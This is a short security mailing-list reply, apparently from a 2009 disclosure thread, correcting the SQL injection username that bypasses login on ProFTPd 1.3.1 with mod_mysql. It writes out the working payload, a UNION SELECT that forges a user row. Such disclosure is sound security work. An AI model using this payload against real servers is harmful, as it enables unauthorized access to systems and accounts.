Re: Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well) Feb 11 2009 07:20AM
gat3way gat3way eu
Uh-oh, sorry, bad copy-paste..the user is just

%') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --

not

USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --

I am using debian packaged proftpd 1.3.1-16 if that matters.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus